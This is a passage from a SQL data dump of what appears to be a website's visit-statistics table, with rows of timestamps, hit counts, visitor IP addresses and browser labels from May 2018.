,'chrome'),(241456,1525673490,2,2,0,0,'95.132.38.33','firefox'),(241457,1525673670,1,1,0,0,'89.111.179.130','chrome'),(241458,1525673693,1,1,0,0,'54.36.148.164','other'),(241459,1525673784,1,1,0,0,'8.29.198.26','other'),(241460,1525673850,1,1,0,0,'54.36.149.32','other'),(241461,1525674016,1,1,0,0,'178.154.171.24','other'),(241462,1525674058,1,1,0,0,'216.244.66.237','other'),(241463,1525674553,1,1,0,0,'46.133.190.21','chrome'),(241464,1525674672,1,1,0,0,'54.36.148.99','other'),(241465,1525674879,1,1,0,0,'54.36.149.52','other'),(241466,1525675048,2,2,0,0,'217.61.0.54','chrome'),(241467,1525675176,1,1,0,0,'148.251.44.106','chrome'),(241468,1525675236,1,1,0,0,'54.36.148.215','other'),(241469,1525675357,1,1,0,0,'54.36.149.39','other'),(241470,1525675371,1,1,0,0,'54.36.149.17','other'),(241471,1525675635,1,1,0,0,'54.36.148.67','other'),(241472,1525675650,1,1,0,0,'91.196.178.4','chrome'),(241473,1525675671,1,1,0,0,'185.98.7.226','chrome'),(241474,1525675687,1,0,1,0,'66.249.64.29',''),(241475,1525675718,1,1,0,0,'216.244.66.237','other'),(241476,1525675803,1,1,0,0,'54.36.148.222','other'),(241477,1525675850,1,1,0,0,'54.36.149.25','other'),(241478,1525676182,1,1,0,0,'54.36.148.191','other'),(241479,1525676192,1,1,0,0,'77.111.244.71','chrome'),(241480,1525676263,1,1,0,0,'176.101.221.227','chrome'),(241481,1525676662,2,2,0,0,'162.210.196.100','other'),(241482,1525676672,1,1,0,0,'54.36.148.46','other'),(241483,1525676740,1,1,0,0,'54.36.148.162','other'),(241484,1525676764,1,1,0,0,'216.244.66.237','other'),(241485,1525677018,1,1,0,0,'54.36.148.187','other'),(241486,1525677767,1,1,0,0,'46.133.91.25','chrome'),(241487,1525677893,1,1,0,0,'54.36.148.185','other'),(241488,1525678158,2,2,0,0,'91.196.178.65','chrome'),(241489,1525678260,1,1,0,0,'54.36.148.15','other'),(241490,1525678289,1,1,0,0,'37.9.113.138','other'),(241491,1525678593,1,1,0,0,'66.249.64.29','chrome'),(241492,1525678741,2,2,0,0,'91.196.178.97','chrome'),(241493,1525679131,1,1,0,0,'54.36.148.173','other'),(241494,1525679342,1,1,0,0,'8.29.198.26','other'),(241495,1525679399,1,1,0,0,'54.36.149.44','other'),(241496,1525679402,1,1,0,0,'157.55.39.184','other'),(241497,1525679415,2,2,0,0,'195.230.119.59','chrome'),(241498,1525679500,1,1,0,0,'192.162.233.33','chrome'),(241499,1525679851,1,1,0,0,'54.36.149.92','other'),(241500,1525679865,3,3,0,0,'138.197.217.55','chrome'),(241501,1525679871,1,1,0,0,'146.185.157.51','chrome'),(241502,1525679952,1,1,0,0,'54.36.148.237','other'),(241503,1525680265,1,1,0,0,'178.140.88.82','msie'),(241504,1525680319,1,1,0,0,'46.133.190.21','chrome'),(241505,1525680321,1,1,0,0,'54.36.149.102','other'),(241506,1525680347,1,1,0,0,'54.36.148.224','other'),(241507,1525680442,1,1,0,0,'91.196.178.3','chrome'),(241508,1525680634,1,1,0,0,'54.36.148.10','other'),(241509,1525680725,1,1,0,0,'54.36.149.80','other'),(241510,1525680757,1,1,0,0,'37.54.163.221','chrome'),(241511,1525680859,1,1,0,0,'54.36.148.12','other'),(241512,1525680997,1,1,0,0,'54.36.148.51','other'),(241513,1525681158,1,1,0,0,'54.36.148.150','other'),(241514,1525681410,1,1,0,0,'54.36.149.96','other'),(241515,1525681780,2,2,0,0,'213.108.45.138','chrome'),(241516,1525681983,1,1,0,0,'54.36.148.79','other'),(241517,1525682059,1,1,0,0,'46.200.214.75','chrome'),(241518,1525682086,1,1,0,0,'54.36.149.88','other'),(241519,1525682202,2,2,0,0,'91.196.178.89','chrome'),(241520,1525682270,1,1,0,0,'54.36.149.73','other'),(241521,1525682432,1,1,0,0,'54.36.148.151','other'),(241522,1525682518,1,1,0,0,'54.36.148.28','other'),(241523,1525682537,1,1,0,0,'54.36.148.30','other'),(241524,1525682542,1,1,0,0,'54.36.148.152','other'),(241525,1525682638,1,1,0,0,'91.196.178.130','firefox'),(241526,1525682731,1,1,0,0,'54.36.149.46','other'),(241527,1525683078,1,1,0,0,'54.36.148.199','other'),(241528,1525683211,2,2,0,0,'54.36.148.87','other'),(241529,1525683297,1,1,0,0,'91.196.178.166','chrome'),(241530,1525683390,1,1,0,0,'54.36.148.68','other'),(241531,1525683436,1,1,0,0,'95.85.33.177','chrome'),(241532,1525683615,1,1,0,0,'54.36.148.41','other'),(241533,1525683891,1,1,0,0,'54.36.148.12','other'),(241534,1525683980,1,1,0,0,'178.154.171.81','other'),(241535,1525684142,1,1,0,0,'54.36.149.31','other'),(241536,1525684378,1,1,0,0,'54.36.149.3','other'),(241537,1525684394,2,2,0,0,'95.85.33.177','chrome'),(241538,1525684408,2,2,0,0,'91.196.178.8','chrome'),(241539,1525684481,3,3,0,0,'178.20.159.183','chrome'),(241540,1525684523,1,1,0,0,'178.255.215.94','other'),(241541,1525684617,1,1,0,0,'8.29.198.27','other'),(241542,1525684637,1,1,0,0,'176.9.161.230','chrome'),(241543,1525684674,1,1,0,0,'216.244.66.237','other'),(241544,1525684692,1,1,0,0,'54.36.148.204','other'),(241545,1525685207,2,2,0,0,'91.196.178.81','chrome'),(241546,1525685412,1,1,0,0,'54.36.149.8','other'),(241547,1525685428,1,1,0,0,'157.55.39.74','other'),(241548,1525685658,1,1,0,0,'54.36.148.226','other'),(241549,1525685883,1,1,0,0,'87.250.224.66','other'),(241550,1525686143,1,1,0,0,'91.196.178.166','chrome'),(241551,1525686205,1,1,0,0,'81.88.49.5','chrome'),(241552,1525686219,2,2,0,0,'81.88.49.39','chrome'),(241553,1525686239,1,1,0,0,'81.88.49.26','chrome'),(241554,1525686274,1,1,0,0,'54.36.148.199','other'),(241555,1525686833,2,2,0,0,'91.196.178.81','chrome'),(241556,1525686981,1,1,0,0,'54.36.149.63','other'),(241557,1525687049,1,1,0,0,'54.36.149.85','other'),(241558,1525687195,1,1,0,0,'91.189.123.230','chrome'),(241559,1525687223,1,1,0,0,'54.36.148.160','other'),(241560,1525687309,2,2,0,0,'91.196.178.169','chrome'),(241561,1525687686,1,1,0,0,'54.36.148.70','other'),(241562,1525687841,4,4,0,0,'202.218.119.118','chrome'),(241563,1525688111,1,1,0,0,'54.36.149.103','other'),(241564,1525688210,1,1,0,0,'54.36.148.121','other'),(241565,1525688384,1,1,0,0,'95.170.70.17','chrome'),(241566,1525688600,1,1,0,0,'54.36.148.173','other'),(241567,1525688748,1,1,0,0,'54.36.148.75','other'),(241568,1525688971,1,1,0,0,'54.36.148.166','other'),(241569,1525688978,1,1,0,0,'176.9.161.230','chrome'),(241570,1525689129,1,1,0,0,'95.216.19.112','other'),(241571,1525689933,1,1,0,0,'66.249.64.28','chrome'),(241572,1525690004,1,1,0,0,'54.36.149.84','other'),(241573,1525690149,1,1,0,0,'54.36.148.104','other'),(241574,1525690161,1,1,0,0,'8.29.198.27','other'),(241575,1525690221,1,1,0,0,'54.36.148.91','other'),(241576,1525690265,1,1,0,0,'54.36.148.73','other'),(241577,1525690428,1,1,0,0,'37.54.18.1','firefox'),(241578,1525690521,1,1,0,0,'141.8.142.50','other'),(241579,1525690629,2,2,0,0,'164.132.43.196','chrome'),(241580,1525690750,1,1,0,0,'87.250.224.96','other'),(241581,1525690803,1,1,0,0,'216.244.66.237','other'),(241582,1525691310,1,1,0,0,'54.36.148.214','other'),(241583,1525691443,1,1,0,0,'54.36.148.122','other'),(241584,1525691681,1,1,0,0,'54.36.148.197','other'),(241585,1525691789,1,1,0,0,'54.36.148.40','other'),(241586,1525691827,1,1,0,0,'178.154.171.24','other'),(241587,1525691855,2,2,0,0,'91.196.178.89','chrome'),(241588,1525691985,1,1,0,0,'54.36.149.74','other'),(241589,1525692176,1,1,0,0,'185.86.167.115','chrome'),(241590,1525692877,1,1,0,0,'54.36.148.61','other'),(241591,1525692980,3,3,0,0,'91.196.178.89','chrome'),(241592,1525693027,1,1,0,0,'54.36.148.254','other'),(241593,1525693595,1,1,0,0,'54.36.148.227','other'),(241594,1525693870,1,1,0,0,'54.36.148.204','other'),(241595,1525693877,1,1,0,0,'54.36.148.108','other'),(241596,1525693914,2,2,0,0,'178.62.208.24','chrome'),(241597,1525693927,1,1,0,0,'54.36.149.33','other'),(241598,1525693956,1,1,0,0,'88.135.215.163','chrome'),(241599,1525694138,1,1,0,0,'193.106.30.99','firefox'),(241600,1525694160,1,1,0,0,'54.36.148.32','other'),(241601,1525695233,1,1,0,0,'54.36.148.251','other'),(241602,1525695247,1,1,0,0,'54.36.148.86','other'),(241603,1525695378,1,1,0,0,'91.121.108.161','chrome'),(241604,1525695439,1,1,0,0,'8.29.198.26','other'),(241605,1525695477,1,1,0,0,'141.8.142.126','other'),(241606,1525695742,1,1,0,0,'54.36.148.159','other'),(241607,1525696074,1,1,0,0,'54.36.149.107','other'),(241608,1525696142,1,1,0,0,'157.55.39.58','other'),(241609,1525696223,1,1,0,0,'54.36.148.105','other'),(241610,1525696549,1,0,1,0,'66.249.70.25',''),(241611,1525696572,1,1,0,0,'146.185.157.242','chrome'),(241612,1525696709,1,1,0,0,'178.210.89.112','chrome'),(241613,1525696710,2,2,0,0,'188.165.184.164','chrome'),(241614,1525696846,1,1,0,0,'37.9.113.157','other'),(241615,1525696895,1,1,0,0,'37.9.113.101','other'),(241616,1525697285,1,1,0,0,'54.36.148.52','other'),(241617,1525697591,1,1,0,0,'54.36.148.95','other'),(241618,1525697674,1,1,0,0,'54.36.148.202','other'),(241619,1525697725,1,1,0,0,'216.244.66.237','other'),(241620,1525697900,1,1,0,0,'54.36.149.78','other'),(241621,1525698271,1,1,0,0,'176.108.15.135','chrome'),(241622,1525698305,1,1,0,0,'91.196.177.46','chrome'),(241623,1525698416,1,1,0,0,'77.222.134.101','chrome'),(241624,1525698484,1,1,0,0,'54.36.148.99','other'),(241625,1525698550,1,1,0,0,'54.36.148.47','other'),(241626,1525698600,2,2,0,0,'72.167.177.198','chrome'),(241627,1525698601,1,1,0,0,'54.36.149.81','other'),(241628,1525698829,1,0,1,0,'66.249.70.27',''),(241629,1525698886,1,1,0,0,'37.55.56.67','chrome'),(241630,1525698908,1,1,0,0,'54.36.148.147','other'),(241631,1525699171,1,1,0,0,'91.225.162.197','chrome'),(241632,1525699520,1,1,0,0,'54.36.148.208','other'),(241633,1525699523,1,1,0,0,'178.154.200.45','other'),(241634,1525699889,1,1,0,0,'95.108.213.24','other'),(241635,1525700019,1,1,0,0,'54.36.149.14','other'),(241636,1525700061,1,1,0,0,'54.36.149.4','other'),(241637,1525700373,1,1,0,0,'54.36.148.164','other'),(241638,1525700424,1,1,0,0,'54.36.148.253','other'),(241639,1525700589,2,2,0,0,'216.244.66.237','other'),(241640,1525700612,1,1,0,0,'91.196.178.97','chrome'),(241641,1525700720,1,1,0,0,'66.249.70.29','chrome'),(241642,1525700918,1,1,0,0,'66.249.64.28','chrome'),(241643,1525700923,1,1,0,0,'54.36.148.86','other'),(241644,1525700954,1,1,0,0,'54.36.149.52','other'),(241645,1525700971,1,1,0,0,'54.36.148.207','other'),(241646,1525700993,1,1,0,0,'8.29.198.27','other'),(241647,1525701080,4,4,0,0,'94.127.186.6','chrome'),(241648,1525701612,1,1,0,0,'54.36.148.170','other'),(241649,1525701871,1,1,0,0,'207.46.13.50','other'),(241650,1525701945,1,1,0,0,'54.36.148.37','other'),(241651,1525701991,1,1,0,0,'37.55.56.67','chrome'),(241652,1525702017,1,1,0,0,'141.8.142.134','other'),(241653,1525702020,1,1,0,0,'213.180.203.7','other'),(241654,1525702115,3,3,0,0,'91.196.178.81','chrome'),(241655,1525702186,1,1,0,0,'54.36.148.10','other'),(241656,1525702345,1,1,0,0,'91.196.178.75','firefox'),(241657,1525702599,2,2,0,0,'103.67.235.111','chrome'),(241658,1525702639,2,2,0,0,'91.196.178.169','chrome'),(241659,1525702674,1,1,0,0,'203.174.83.178','chrome'),(241660,1525702911,1,1,0,0,'134.0.11.71','chrome'),(241661,1525702984,1,1,0,0,'81.88.49.33','chrome'),(241662,1525703011,1,1,0,0,'81.88.49.50','chrome'),(241663,1525703029,1,1,0,0,'81.88.49.52','chrome'),(241664,1525703044,1,1,0,0,'81.88.49.35','chrome'),(241665,1525703060,1,1,0,0,'54.36.148.195','other'),(241666,1525703390,1,1,0,0,'178.154.171.4','other'),(241667,1525703419,1,1,0,0,'54.36.149.17','other'),(241668,1525703757,1,1,0,0,'54.36.148.99','other'),(241669,1525703833,1,1,0,0,'46.161.9.39','firefox'),(241670,1525703845,1,1,0,0,'212.90.181.166','firefox'),(241671,1525704217,3,3,0,0,'186.202.126.163','chrome'),(241672,1525704501,1,1,0,0,'103.242.3.151','chrome'),(241673,1525704640,1,1,0,0,'54.36.149.85','other'),(241674,1525705121,1,1,0,0,'54.36.148.181','other'),(241675,1525705237,1,1,0,0,'91.196.178.3','chrome'),(241676,1525705277,1,1,0,0,'163.172.255.139','chrome'),(241677,1525705517,1,1,0,0,'54.36.148.139','other'),(241678,1525706039,1,1,0,0,'216.244.66.237','other'),(241679,1525706259,1,1,0,0,'8.29.198.25','other'),(241680,1525706322,1,1,0,0,'54.36.148.85','other'),(241681,1525706630,1,1,0,0,'138.201.163.62','chrome'),(241682,1525706716,1,1,0,0,'91.189.123.230','chrome'),(241683,1525706825,1,1,0,0,'54.36.149.95','other'),(241684,1525706830,1,1,0,0,'54.36.148.138','other'),(241685,1525707165,1,0,1,0,'66.249.70.27',''),(241686,1525708062,1,1,0,0,'157.55.39.184','other'),(241687,1525708165,2,2,0,0,'91.189.123.230','chrome'),(241688,1525708271,1,1,0,0,'54.36.149.19','other'),(241689,1525708321,1,1,0,0,'54.36.148.121','other'),(241690,1525708903,1,1,0,0,'54.36.148.113','other'),(241691,1525709184,1,1,0,0,'54.36.148.94','other'),(241692,1525709211,1,1,0,0,'54.36.148.195','other'),(241693,1525709555,2,2,0,0,'138.201.163.62','chrome'),(241694,1525709733,1,1,0,0,'141.8.142.134','other'),(241695,1525710142,1,1,0,0,'177.47.187.23','chrome'),(241696,1525710276,1,1,0,0,'141.8.142.74','other'),(241697,1525710802,2,2,0,0,'91.209.11.236','other'),(241698,1525711523,1,1,0,0,'54.36.148.165','other'),(241699,1525711684,1,1,0,0,'54.36.148.173','other'),(241700,1525711692,6,6,0,0,'94.142.140.211','firefox'),(241701,1525711819,1,1,0,0,'8.29.198.25','other'),(241702,1525711912,1,1,0,0,'54.36.148.77','other'),(241703,1525712109,1,1,0,0,'141.8.142.96','other'),(241704,1525712372,2,2,0,0,'91.196.178.167','chrome'),(241705,1525712485,1,1,0,0,'54.36.148.231','other'),(241706,1525712492,1,1,0,0,'54.36.148.128','other'),(241707,1525712505,2,2,0,0,'185.68.109.213','chrome'),(241708,1525712516,1,1,0,0,'138.68.81.15','chrome'),(241709,1525712549,1,1,0,0,'37.115.210.145','chrome'),(241710,1525713052,1,1,0,0,'54.36.149.73','other'),(241711,1525713349,1,1,0,0,'54.36.149.86','other'),(241712,1525713496,1,1,0,0,'54.36.149.35','other'),(241713,1525713509,1,1,0,0,'54.36.148.92','other'),(241714,1525713740,1,1,0,0,'54.36.148.119','other'),(241715,1525713831,1,1,0,0,'54.36.148.128','other'),(241716,1525714039,1,1,0,0,'54.36.148.186','other'),(241717,1525714543,1,1,0,0,'216.244.66.237','other'),(241718,1525714669,1,1,0,0,'54.36.149.79','other'),(241719,1525715182,2,2,0,0,'91.196.178.163','chrome'),(241720,1525715377,2,2,0,0,'91.189.123.230','chrome'),(241721,1525715474,1,1,0,0,'54.36.148.255','other'),(241722,1525715553,1,1,0,0,'5.196.94.125','chrome'),(241723,1525715727,1,1,0,0,'138.197.10.226','chrome'),(241724,1525716016,1,1,0,0,'54.36.149.95','other'),(241725,1525716329,1,1,0,0,'95.170.70.17','chrome'),(241726,1525716445,1,1,0,0,'54.36.148.219','other'),(241727,1525716683,2,2,0,0,'91.196.178.86','chrome'),(241728,1525716721,1,1,0,0,'141.8.132.19','other'),(241729,1525717109,1,1,0,0,'8.29.198.25','other'),(241730,1525717144,3,3,0,0,'159.203.76.114','chrome'),(241731,1525717357,1,1,0,0,'54.36.148.167','other'),(241732,1525717482,1,1,0,0,'178.154.200.8','other'),(241733,1525717666,1,1,0,0,'54.36.149.81','other'),(241734,1525717699,1,1,0,0,'54.36.148.55','other'),(241735,1525717890,1,1,0,0,'54.36.148.194','other'),(241736,1525718024,1,1,0,0,'213.179.252.33','chrome'),(241737,1525718227,1,1,0,0,'81.2.195.84','chrome'),(241738,1525718528,1,1,0,0,'54.36.148.221','other'),(241739,1525718566,4,4,0,0,'122.28.54.19','chrome'),(241740,1525718676,1,1,0,0,'91.196.178.86','chrome'),(241741,1525718716,2,2,0,0,'77.232.66.20','chrome'),(241742,1525718772,1,1,0,0,'54.36.148.102','other'),(241743,1525718852,1,1,0,0,'54.36.149.39','other'),(241744,1525718996,1,1,0,0,'37.73.232.146','chrome'),(241745,1525719312,1,1,0,0,'54.36.149.26','other'),(241746,1525719407,1,1,0,0,'54.36.149.76','other'),(241747,1525719410,1,1,0,0,'54.36.149.102','other'),(241748,1525719834,3,3,0,0,'67.227.194.55','chrome'),(241749,1525720527,1,1,0,0,'54.36.148.98','other'),(241750,1525720875,1,1,0,0,'54.36.149.101','other'),(241751,1525720931,1,1,0,0,'54.36.148.166','other'),(241752,1525720934,1,1,0,0,'54.36.149.38','other'),(241753,1525720969,1,1,0,0,'54.36.148.251','other'),(241754,1525721337,1,1,0,0,'103.67.235.97','chrome'),(241755,1525721627,1,1,0,0,'54.36.148.63','other'),(241756,1525721659,1,1,0,0,'54.36.148.73','other'),(241757,1525721687,1,1,0,0,'216.244.66.237','other'),(241758,1525721960,1,1,0,0,'207.46.13.50','other'),(241759,1525722135,1,1,0,0,'54.36.149.2','other'),(241760,1525722139,1,1,0,0,'54.36.148.121','other'),(241761,1525722524,1,1,0,0,'54.36.148.220','other'),(241762,1525722642,1,1,0,0,'8.29.198.27','other'),(241763,1525722763,1,0,1,0,'66.249.66.157',''),(241764,1525722769,1,1,0,0,'66.249.66.156','chrome'),(241765,1525722950,1,1,0,0,'54.36.148.218','other'),(241766,1525723139,1,1,0,0,'54.36.149.39','other'),(241767,1525723261,1,1,0,0,'54.36.149.49','other'),(241768,1525723436,1,1,0,0,'120.35.38.103','other'),(241769,1525723658,1,1,0,0,'54.36.148.80','other'),(241770,1525723832,1,1,0,0,'54.36.148.211','other'),(241771,1525724431,1,1,0,0,'54.36.148.198','other'),(241772,1525724707,1,1,0,0,'54.36.149.98','other'),(241773,1525725248,1,1,0,0,'54.36.149.77','other'),(241774,1525725280,1,1,0,0,'54.36.148.161','other'),(241775,1525725462,2,2,0,0,'216.244.66.237','other'),(241776,1525725721,1,1,0,0,'54.36.148.106','other'),(241777,1525725748,1,1,0,0,'54.36.148.255','other'),(241778,1525725769,1,1,0,0,'54.36.148.69','other'),(241779,1525725869,1,1,0,0,'54.36.148.201','other'),(241780,1525725951,1,1,0,0,'54.36.148.192','other'),(241781,1525726208,1,1,0,0,'54.36.149.44','other'),(241782,1525726421,2,2,0,0,'91.196.178.14','chrome'),(241783,1525726679,1,1,0,0,'54.36.148.162','other'),(241784,1525726765,1,1,0,0,'54.36.148.228','other'),(241785,1525726854,1,1,0,0,'91.196.178.86','chrome'),(241786,1525726890,1,1,0,0,'54.36.148.123','other'),(241787,1525727886,1,1,0,0,'37.9.113.114','other'),(241788,1525727915,1,1,0,0,'54.36.149.3','other'),(241789,1525727931,1,1,0,0,'8.29.198.27','other'),(241790,1525728214,1,1,0,0,'54.36.148.17','other'),(241791,1525728240,1,1,0,0,'54.36.148.138','other'),(241792,1525728273,1,1,0,0,'54.36.149.31','other'),(241793,1525728681,2,2,0,0,'164.132.43.196','chrome'),(241794,1525728777,1,1,0,0,'54.36.148.250','other'),(241795,1525729397,1,1,0,0,'40.77.167.49','other'),(241796,1525729503,1,1,0,0,'54.36.149.38','other'),(241797,1525729863,1,1,0,0,'54.36.148.94','other'),(241798,1525729960,1,1,0,0,'141.8.142.29','other'),(241799,1525730090,1,1,0,0,'37.9.113.60','other'),(241800,1525730233,1,1,0,0,'54.36.149.56','other'),(241801,1525730236,1,1,0,0,'54.36.148.149','other'),(241802,1525730321,1,1,0,0,'54.36.148.121','other'),(241803,1525730397,1,1,0,0,'54.36.148.106','other'),(241804,1525730483,1,1,0,0,'54.36.148.197','other'),(241805,1525730509,1,1,0,0,'54.36.148.19','other'),(241806,1525730627,1,1,0,0,'54.36.148.35','other'),(241807,1525730634,1,1,0,0,'185.104.29.4','chrome'),(241808,1525730722,1,1,0,0,'54.36.149.69','other'),(241809,1525731193,1,1,0,0,'54.36.148.241','other'),(241810,1525731420,1,1,0,0,'54.36.148.42','other'),(241811,1525731431,2,2,0,0,'138.201.163.62','chrome'),(241812,1525731772,2,2,0,0,'178.154.171.81','other'),(241813,1525731841,1,1,0,0,'207.46.13.50','other'),(241814,1525731942,1,1,0,0,'54.36.149.72','other'),(241815,1525732657,1,1,0,0,'54.36.148.237','other'),(241816,1525732697,1,1,0,0,'54.36.148.20','other'),(241817,1525733307,4,4,0,0,'47.52.169.178','chrome'),(241818,1525733488,1,1,0,0,'8.29.198.26','other'),(241819,1525733949,1,1,0,0,'54.36.148.204','other'),(241820,1525734032,1,1,0,0,'54.36.148.68','other'),(241821,1525734253,1,1,0,0,'217.61.0.54','chrome'),(241822,1525734397,1,1,0,0,'180.76.15.163','other'),(241823,1525734404,1,1,0,0,'54.36.148.71','other'),(241824,1525734473,1,1,0,0,'54.36.149.7','other'),(241825,1525734964,1,1,0,0,'54.36.149.105','other'),(241826,1525735012,1,1,0,0,'54.36.149.47','other'),(241827,1525735189,1,1,0,0,'141.8.142.134','other'),(241828,1525735643,1,1,0,0,'66.249.66.75','chrome'),(241829,1525735702,1,1,0,0,'40.77.167.49','other'),(241830,1525735778,1,1,0,0,'54.36.149.70','other'),(241831,1525735790,1,1,0,0,'54.36.148.17','other'),(241832,1525735874,1,1,0,0,'54.36.148.73','other'),(241833,1525736172,1,1,0,0,'46.41.144.57','chrome'),(241834,1525736261,1,1,0,0,'54.36.148.205','other'),(241835,1525736298,1,1,0,0,'54.36.148.221','other'),(241836,1525736395,1,1,0,0,'77.81.120.20','chrome'),(241837,1525737464,1,1,0,0,'37.9.113.114','other'),(241838,1525737510,1,1,0,0,'216.244.66.237','other'),(241839,1525737722,1,1,0,0,'79.133.45.238','chrome'),(241840,1525737723,1,1,0,0,'54.36.148.170','other'),(241841,1525737744,1,1,0,0,'54.36.149.7','other'),(241842,1525737898,1,1,0,0,'54.36.148.206','other'),(241843,1525738517,1,1,0,0,'54.36.148.70','other'),(241844,1525738625,1,1,0,0,'192.241.136.79','chrome'),(241845,1525738629,1,1,0,0,'54.36.149.93','other'),(241846,1525738699,1,1,0,0,'178.154.200.28','other'),(241847,1525738757,1,1,0,0,'8.29.198.27','other'),(241848,1525738787,1,1,0,0,'178.154.200.32','other'),(241849,1525738790,1,1,0,0,'87.250.224.85','other'),(241850,1525738844,1,0,1,0,'66.249.66.74',''),(241851,1525739156,1,1,0,0,'178.154.200.7','other'),(241852,1525739163,1,1,0,0,'178.154.171.81','other'),(241853,1525739840,1,1,0,0,'216.244.66.237','other'),(241854,1525739915,1,1,0,0,'54.36.148.216','other'),(241855,1525740129,1,1,0,0,'54.36.148.72','other'),(241856,1525740189,1,1,0,0,'62.146.152.18','chrome'),(241857,1525740550,2,2,0,0,'217.69.134.178','other'),(241858,1525740779,2,2,0,0,'54.165.59.7','other'),(241859,1525741524,1,1,0,0,'217.69.134.183','other'),(241860,1525741537,1,1,0,0,'217.69.133.4','other'),(241861,1525741601,2,2,0,0,'89.111.179.130','chrome'),(241862,1525742713,1,1,0,0,'216.244.66.237','other'),(241863,1525742950,1,1,0,0,'37.9.113.110','other'),(241864,1525743004,3,3,0,0,'212.90.148.92','chrome'),(241865,1525743037,2,2,0,0,'37.187.254.23','chrome'),(241866,1525743057,1,1,0,0,'54.36.148.188','other'),(241867,1525743059,1,1,0,0,'54.36.148.174','other'),(241868,1525743064,2,2,0,0,'72.52.133.20','chrome'),(241869,1525743067,1,1,0,0,'37.145.36.144','msie'),(241870,1525743196,1,1,0,0,'54.36.148.161','other'),(241871,1525743714,1,1,0,0,'54.36.149.42','other'),(241872,1525744088,1,1,0,0,'54.36.148.39','other'),(241873,1525744205,1,1,0,0,'54.36.148.19','other'),(241874,1525744310,2,2,0,0,'185.98.7.102','chrome'),(241875,1525744314,1,1,0,0,'8.29.198.26','other'),(241876,1525744338,2,2,0,0,'51.254.204.117','chrome'),(241877,1525744426,1,1,0,0,'216.244.66.237','other'),(241878,1525744570,1,1,0,0,'93.125.99.34','chrome'),(241879,1525744620,1,1,0,0,'54.36.149.49','other'),(241880,1525744796,1,1,0,0,'54.36.148.200','other'),(241881,1525744987,1,1,0,0,'54.36.149.13','other'),(241882,1525745055,1,1,0,0,'54.36.148.81','other'),(241883,1525745130,1,1,0,0,'87.250.224.125','other'),(241884,1525745283,1,1,0,0,'54.36.148.15','other'),(241885,1525745743,1,1,0,0,'54.36.149.16','other'),(241886,1525745752,1,1,0,0,'54.36.148.53','other'),(241887,1525745967,6,6,0,0,'78.46.98.216','chrome'),(241888,1525745978,2,2,0,0,'178.32.13.93','chrome'),(241889,1525746156,1,1,0,0,'91.189.123.230','chrome'),(241890,1525746182,1,1,0,0,'54.36.148.222','other'),(241891,1525746188,1,1,0,0,'54.36.148.241','other'),(241892,1525746863,1,1,0,0,'54.36.149.8','other'),(241893,1525746974,1,1,0,0,'157.55.39.58','other'),(241894,1525747166,1,1,0,0,'54.36.148.246','other'),(241895,1525747402,1,1,0,0,'89.140.72.84','chrome'),(241896,1525747611,2,2,0,0,'95.213.141.126','opera'),(241897,1525748313,2,0,2,0,'66.249.66.156',''),(241898,1525748348,1,0,1,0,'66.249.66.155',''),(241899,1525748593,1,1,0,0,'54.36.149.58','other'),(241900,1525748618,1,1,0,0,'54.36.148.138','other'),(241901,1525748629,1,1,0,0,'212.90.148.92','chrome'),(241902,1525748806,1,1,0,0,'54.36.148.107','other'),(241903,1525749310,1,1,0,0,'66.249.66.76','chrome'),(241904,1525749495,1,1,0,0,'54.36.148.119','other'),(241905,1525749589,1,1,0,0,'8.29.198.27','other'),(241906,1525749853,1,1,0,0,'188.230.43.254','other'),(241907,1525749931,1,1,0,0,'216.244.66.237','other'),(241908,1525750183,2,2,0,0,'199.116.77.28','chrome'),(241909,1525750471,1,1,0,0,'37.9.113.60','other'),(241910,1525750895,1,1,0,0,'54.36.148.141','other'),(241911,1525751101,1,1,0,0,'54.36.149.68','other'),(241912,1525751210,1,1,0,0,'5.45.207.49','other'),(241913,1525751233,1,1,0,0,'54.36.148.28','other'),(241914,1525751561,1,1,0,0,'185.98.7.226','chrome'),(241915,1525751636,1,1,0,0,'54.36.148.29','other'),(241916,1525751756,1,1,0,0,'91.121.108.161','chrome'),(241917,1525752016,1,1,0,0,'157.55.39.184','other'),(241918,1525752220,1,1,0,0,'54.36.148.77','other'),(241919,1525752252,1,1,0,0,'188.230.43.254','other'),(241920,1525752308,1,1,0,0,'54.36.149.81','other'),(241921,1525752314,1,1,0,0,'54.36.148.195','other'),(241922,1525752380,1,1,0,0,'54.36.148.209','other'),(241923,1525752829,1,1,0,0,'54.36.148.126','other'),(241924,1525753072,1,1,0,0,'54.36.148.73','other'),(241925,1525753074,1,1,0,0,'54.36.148.243','other'),(241926,1525753076,1,1,0,0,'54.36.148.111','other'),(241927,1525753106,1,1,0,0,'66.249.66.155','chrome'),(241928,1525753175,2,2,0,0,'66.249.66.157','chrome'),(241929,1525753403,1,1,0,0,'5.45.207.49','other'),(241930,1525753889,1,1,0,0,'207.46.13.50','other'),(241931,1525754000,1,1,0,0,'40.77.167.49','other'),(241932,1525754195,1,1,0,0,'54.36.148.59','other'),(241933,1525754220,1,1,0,0,'93.125.99.17','chrome'),(241934,1525754537,1,1,0,0,'54.36.148.212','other'),(241935,1525754659,1,1,0,0,'188.230.43.254','other'),(241936,1525755142,1,1,0,0,'8.29.198.27','other'),(241937,1525755197,1,1,0,0,'188.120.240.50','chrome'),(241938,1525755213,1,1,0,0,'67.227.157.7','chrome'),(241939,1525755286,1,1,0,0,'54.36.148.224','other'),(241940,1525755438,1,1,0,0,'37.9.113.60','other'),(241941,1525755617,1,1,0,0,'54.36.149.11','other'),(241942,1525755628,1,1,0,0,'54.36.149.94','other'),(241943,1525756080,1,1,0,0,'91.227.68.42','chrome'),(241944,1525756167,1,1,0,0,'93.125.99.61','chrome'),(241945,1525756209,1,1,0,0,'54.36.148.157','other'),(241946,1525756254,1,1,0,0,'66.249.66.156','chrome'),(241947,1525756364,1,1,0,0,'54.36.148.107','other'),(241948,1525756365,1,1,0,0,'54.36.149.51','other'),(241949,1525756509,1,1,0,0,'95.135.49.44','chrome'),(241950,1525756771,1,1,0,0,'54.36.149.36','other'),(241951,1525757056,1,1,0,0,'188.230.43.254','other'),(241952,1525757103,1,1,0,0,'178.154.200.59','other'),(241953,1525757123,2,2,0,0,'91.196.178.81','chrome'),(241954,1525757211,1,1,0,0,'54.36.149.13','other'),(241955,1525757555,2,2,0,0,'93.125.99.83','chrome'),(241956,1525757565,1,1,0,0,'54.36.148.124','other'),(241957,1525757584,2,2,0,0,'138.201.163.62','chrome'),(241958,1525757893,1,1,0,0,'54.36.148.148','other'),(241959,1525757957,1,1,0,0,'138.68.81.15','chrome'),(241960,1525757977,1,1,0,0,'54.36.148.154','other'),(241961,1525758112,1,1,0,0,'103.67.235.50','chrome'),(241962,1525758292,1,1,0,0,'91.196.177.